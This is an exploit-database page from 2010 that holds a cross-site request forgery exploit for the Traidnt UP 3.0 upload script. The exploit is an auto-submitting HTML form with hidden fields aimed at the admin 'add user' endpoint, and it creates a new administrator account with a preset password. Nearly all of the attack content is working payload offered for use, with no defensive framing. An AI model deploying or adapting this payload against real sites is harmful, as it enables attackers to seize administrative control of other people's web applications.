Home / os / win7

[webapps / 0day] - Traidnt UP - Cross-Site Request Forgery A

Posted on 24 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Traidnt UP - Cross-Site Request Forgery Add Admin Account | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 24 Sep 2010 | Exploit category: webapps / 0day | Exploit author: John Johnz | Inj3ct0r exploit database' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>========================================================= Traidnt UP - Cross-Site Request Forgery Add Admin Account ========================================================= # Exploit Title: Traidnt UP - CSRF Add Admin Account # Date: 24-09-2010 # Author: G0D-F4Th3r # Software Link: http://www.traidnt.net # Software Download: http://traidntup.googlecode.com/files/Traidnt%20up%20V3.0.zip # Version: 3.0 #######################Exploit####################################### &lt;html&gt; &lt;body onload=&quot;javascript:fireForms()&quot;&gt; &lt;form method=&quot;POST&quot; name=&quot;form0&quot; action=&quot; http://www.site.com/[path]/admin/users.php?do=addnew&quot;&gt; &lt;input type=&quot;hidden&quot; name=&quot;name&quot; value=&quot;admin2&quot;/&gt; &lt;input type=&quot;hidden&quot; name=&quot;password&quot; value=&quot;123456&quot;/&gt; &lt;input type=&quot;hidden&quot; name=&quot;email&quot; value=&quot;mail@mail.com&quot;/&gt; &lt;input type=&quot;hidden&quot; name=&quot;birthdate&quot; value=&quot;1985&quot;/&gt; &lt;input type=&quot;hidden&quot; name=&quot;country&quot; value=&quot;Saudi Arabia&quot;/&gt; &lt;input type=&quot;hidden&quot; name=&quot;group&quot; value=&quot;1&quot;/&gt; &lt;/form&gt; &lt;/body&gt; &lt;/html&gt; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-24]</pre></body></html>

 

TOP